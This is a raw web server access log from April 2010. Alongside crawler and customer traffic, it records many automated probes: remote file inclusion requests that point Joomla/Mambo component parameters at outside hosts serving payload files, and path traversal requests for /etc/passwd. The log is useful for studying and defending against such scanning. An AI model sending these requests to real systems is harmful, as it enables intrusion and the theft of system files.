200.78.238.157 - - [16/Apr/2010:00:38:18 -0400] "GET /logs/access_log.Q109062900%20%20//administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
66.249.67.232 - - [16/Apr/2010:00:38:19 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+LA2334D5033965800580309Q+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
79.98.23.9 - - [16/Apr/2010:00:38:34 -0400] "GET /logs/access_log.Q109110300%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.howtolisten.kr/lct/exam3/111/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
174.133.122.210 - - [16/Apr/2010:00:38:47 -0400] "GET //components/com_bsq_sitestats/external/rssfeed.php?baseDir=http://www.rittsound.com//modules/copyme.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
174.133.122.210 - - [16/Apr/2010:00:38:47 -0400] "GET /logs//components/com_bsq_sitestats/external/rssfeed.php?baseDir=http://www.rittsound.com//modules/copyme.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
67.195.114.252 - - [16/Apr/2010:00:38:37 -0400] "GET /logs/error_log.Q109060700 HTTP/1.0" 200 2560143 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
79.174.78.178 - - [16/Apr/2010:00:38:58 -0400] "GET /logs/access_log.Q110032400%20%20//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://mis.cmtc.ac.th/file/pro/one.txt??? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
79.174.78.178 - - [16/Apr/2010:00:39:04 -0400] "GET /logs/error_log.Q110032400%20%20//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://mis.cmtc.ac.th/file/pro/one.txt??? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
82.22.207.181 - - [16/Apr/2010:00:39:10 -0400] "GET //components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.kosba.or.kr/data/common/kobams.com/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
82.22.207.181 - - [16/Apr/2010:00:39:10 -0400] "GET /logs//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.kosba.or.kr/data/common/kobams.com/id1.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
174.133.122.210 - - [16/Apr/2010:00:39:10 -0400] "GET /logs/access_log.Q110031400%20%20//components/com_bsq_sitestats/external/rssfeed.php?baseDir=http://www.rittsound.com//modules/copyme.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
222.236.47.182 - - [16/Apr/2010:00:39:11 -0400] "GET //administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
222.236.47.182 - - [16/Apr/2010:00:39:11 -0400] "GET /logs/access_log.Q109100200//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
222.236.47.182 - - [16/Apr/2010:00:39:11 -0400] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
82.22.207.181 - - [16/Apr/2010:00:39:14 -0400] "GET /logs/access_log.Q109062900%20%20//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.kosba.or.kr/data/common/kobams.com/id1.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
82.22.207.181 - - [16/Apr/2010:00:39:14 -0400] "GET /logs/access_log.Q109071600%20%20//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.kosba.or.kr/data/common/kobams.com/id1.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:00:39:28 -0400] "GET /logs/access_log.Q109100200//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:00:39:28 -0400] "GET //administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:00:39:28 -0400] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
79.174.78.178 - - [16/Apr/2010:00:39:31 -0400] "GET /logs/error_log.Q109090800//administrator/components/com_mmp/help.mmp.php?mosConfig_absolute_path=http://mis.cmtc.ac.th/file/pro/one.txt??? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
79.174.78.178 - - [16/Apr/2010:00:39:31 -0400] "GET /logs//administrator/components/com_mmp/help.mmp.php?mosConfig_absolute_path=http://mis.cmtc.ac.th/file/pro/one.txt??? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
79.174.78.178 - - [16/Apr/2010:00:39:31 -0400] "GET /logs//administrator/components/com_mmp/help.mmp.php?mosConfig_absolute_path=http://mis.cmtc.ac.th/file/pro/one.txt??? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
79.174.78.178 - - [16/Apr/2010:00:39:31 -0400] "GET /logs/error_log.Q109090800//administrator/components/com_mmp/help.mmp.php?mosConfig_absolute_path=http://mis.cmtc.ac.th/file/pro/one.txt??? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
79.174.78.178 - - [16/Apr/2010:00:39:31 -0400] "GET //administrator/components/com_mmp/help.mmp.php?mosConfig_absolute_path=http://mis.cmtc.ac.th/file/pro/one.txt??? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
79.174.78.178 - - [16/Apr/2010:00:39:32 -0400] "GET //administrator/components/com_mmp/help.mmp.php?mosConfig_absolute_path=http://mis.cmtc.ac.th/file/pro/one.txt??? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:00:39:33 -0400] "GET /logs/access_log.Q109060100//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
174.133.122.210 - - [16/Apr/2010:00:40:02 -0400] "GET /logs/access_log.Q110031400//components/com_bsq_sitestats/external/rssfeed.php?baseDir=http://www.rittsound.com//modules/copyme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:00:40:11 -0400] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:00:40:11 -0400] "GET /logs/access_log.Q109100200//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:00:40:11 -0400] "GET //administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
212.59.2.84 - - [16/Apr/2010:00:40:46 -0400] "GET /logs/access_log.Q109111700//include/print_category.php?setup[use_category]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
212.59.2.84 - - [16/Apr/2010:00:40:46 -0400] "GET /logs/error_log.Q110022600//include/print_category.php?setup[use_category]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
222.236.47.182 - - [16/Apr/2010:00:41:27 -0400] "GET //administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
222.236.47.182 - - [16/Apr/2010:00:41:27 -0400] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
222.236.47.182 - - [16/Apr/2010:00:41:27 -0400] "GET /logs/access_log.Q109100200//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
88.191.94.188 - - [16/Apr/2010:00:41:29 -0400] "GET /logs/access_log.Q110032500//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
88.191.94.188 - - [16/Apr/2010:00:42:45 -0400] "GET /logs/access_log.Q110032500//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
99.198.109.18 - - [16/Apr/2010:00:42:49 -0400] "GET //index.php?option=com_custompages&view=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Mac_PowerPC)"
66.118.176.82 - - [16/Apr/2010:00:42:50 -0400] "GET //index.php?option=com_custompages&view=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
84.40.30.37 - - [16/Apr/2010:00:43:06 -0400] "GET //index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://dive2world.com/newdive/1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
84.40.30.37 - - [16/Apr/2010:00:43:10 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://dive2world.com/newdive/1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
84.40.30.37 - - [16/Apr/2010:00:43:10 -0400] "GET /logs/access_log.Q110030500//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://dive2world.com/newdive/1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
66.249.67.232 - - [16/Apr/2010:00:43:11 -0400] "GET /images/over-index4_accessories.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
94.247.178.106 - - [16/Apr/2010:00:43:17 -0400] "GET //index.php?option=com_custompages&view=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1"
84.40.30.37 - - [16/Apr/2010:00:43:34 -0400] "GET //index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://dive2world.com/newdive/1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
84.40.30.37 - - [16/Apr/2010:00:43:34 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://dive2world.com/newdive/1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
84.40.30.37 - - [16/Apr/2010:00:43:37 -0400] "GET /logs/access_log.Q110030500%20%20//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://dive2world.com/newdive/1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
84.40.30.37 - - [16/Apr/2010:00:43:39 -0400] "GET //index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://dive2world.com/newdive/1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
84.40.30.37 - - [16/Apr/2010:00:43:39 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://dive2world.com/newdive/1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
84.40.30.37 - - [16/Apr/2010:00:43:43 -0400] "GET /logs/access_log.Q110030500%20%20//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://dive2world.com/newdive/1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
66.249.67.27 - - [16/Apr/2010:00:44:01 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+LA2334D5033666800570309Q+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
82.22.207.181 - - [16/Apr/2010:00:44:08 -0400] "GET /logs/access_log.Q109072400//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.kosba.or.kr/data/common/kobams.com/id1.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
110.45.147.226 - - [16/Apr/2010:00:44:48 -0400] "GET //modules/xfsection/modify.php?dir_module=http://mytorg.net/ip1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
110.45.147.226 - - [16/Apr/2010:00:44:48 -0400] "GET /logs/access_log.Q109052200%20%20//modules/xfsection/modify.php?dir_module=http://mytorg.net/ip1.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
110.45.147.226 - - [16/Apr/2010:00:44:48 -0400] "GET /logs//modules/xfsection/modify.php?dir_module=http://mytorg.net/ip1.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:00:44:53 -0400] "GET /logs//components/com_pollxt/conf.pollxt.php?bbs_id=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:00:44:53 -0400] "GET //components/com_pollxt/conf.pollxt.php?bbs_id=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:00:44:53 -0400] "GET /logs/access_log.Q110031400%20%20//components/com_pollxt/conf.pollxt.php?bbs_id=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:00:44:59 -0400] "GET /logs/access_log.Q110031400%20%20//components/com_pollxt/conf.pollxt.php?bbs_id=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:00:44:59 -0400] "GET /logs//components/com_pollxt/conf.pollxt.php?bbs_id=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:00:44:59 -0400] "GET //components/com_pollxt/conf.pollxt.php?bbs_id=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:00:45:03 -0400] "GET /logs/access_log.Q110011500%20%20//components/com_pollxt/conf.pollxt.php?bbs_id=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
122.49.201.36 - - [16/Apr/2010:00:45:04 -0400] "GET //index.php?option=com_custompages&view=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
82.22.207.181 - - [16/Apr/2010:00:45:05 -0400] "GET /logs/access_log.Q109070300//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.kosba.or.kr/data/common/kobams.com/id1.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
79.98.23.9 - - [16/Apr/2010:00:45:07 -0400] "GET /logs/error_log.Q109061700%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.howtolisten.kr/lct/exam3/111/id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
79.98.23.9 - - [16/Apr/2010:00:45:07 -0400] "GET /logs/access_log.Q110040100%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.howtolisten.kr/lct/exam3/111/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
209.59.12.99 - - [16/Apr/2010:00:45:59 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
67.195.114.252 - - [16/Apr/2010:00:45:37 -0400] "GET /logs/access_log.Q110022100 HTTP/1.0" 200 3182560 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
222.236.47.182 - - [16/Apr/2010:00:46:24 -0400] "GET /logs/access_log.Q109100200%20%20//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
139.168.143.136 - - [16/Apr/2010:00:46:49 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37 HTTP/1.1" 200 76932 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
139.168.143.136 - - [16/Apr/2010:00:46:52 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
139.168.143.136 - - [16/Apr/2010:00:46:52 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
139.168.143.136 - - [16/Apr/2010:00:46:52 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
139.168.143.136 - - [16/Apr/2010:00:46:53 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
139.168.143.136 - - [16/Apr/2010:00:46:53 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
139.168.143.136 - - [16/Apr/2010:00:46:53 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
139.168.143.136 - - [16/Apr/2010:00:46:53 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
139.168.143.136 - - [16/Apr/2010:00:46:54 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
139.168.143.136 - - [16/Apr/2010:00:46:54 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
139.168.143.136 - - [16/Apr/2010:00:46:55 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
139.168.143.136 - - [16/Apr/2010:00:46:55 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
139.168.143.136 - - [16/Apr/2010:00:46:55 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
139.168.143.136 - - [16/Apr/2010:00:46:55 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
139.168.143.136 - - [16/Apr/2010:00:46:56 -0400] "GET /images/blend.jpg HTTP/1.1" 200 405 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
139.168.143.136 - - [16/Apr/2010:00:46:56 -0400] "GET /images/cat_dot.gif HTTP/1.1" 200 45 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
139.168.143.136 - - [16/Apr/2010:00:46:56 -0400] "GET /images/cat_link.gif HTTP/1.1" 200 46 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
139.168.143.136 - - [16/Apr/2010:00:46:56 -0400] "GET /images/cat_expand.gif HTTP/1.1" 200 79 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
139.168.143.136 - - [16/Apr/2010:00:46:57 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
139.168.143.136 - - [16/Apr/2010:00:46:57 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
139.168.143.136 - - [16/Apr/2010:00:46:58 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
139.168.143.136 - - [16/Apr/2010:00:46:58 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
139.168.143.136 - - [16/Apr/2010:00:46:58 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
139.168.143.136 - - [16/Apr/2010:00:46:58 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
139.168.143.136 - - [16/Apr/2010:00:46:59 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
139.168.143.136 - - [16/Apr/2010:00:46:59 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
139.168.143.136 - - [16/Apr/2010:00:46:59 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
139.168.143.136 - - [16/Apr/2010:00:46:59 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
139.168.143.136 - - [16/Apr/2010:00:47:00 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
99.198.109.18 - - [16/Apr/2010:00:47:35 -0400] "GET /logs/access_log.Q109112600//index.php?option=com_custompages&view=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 235 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1"
99.198.109.18 - - [16/Apr/2010:00:47:36 -0400] "GET //index.php?option=com_custompages&view=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
99.198.109.18 - - [16/Apr/2010:00:47:36 -0400] "GET /logs//index.php?option=com_custompages&view=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 213 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1"
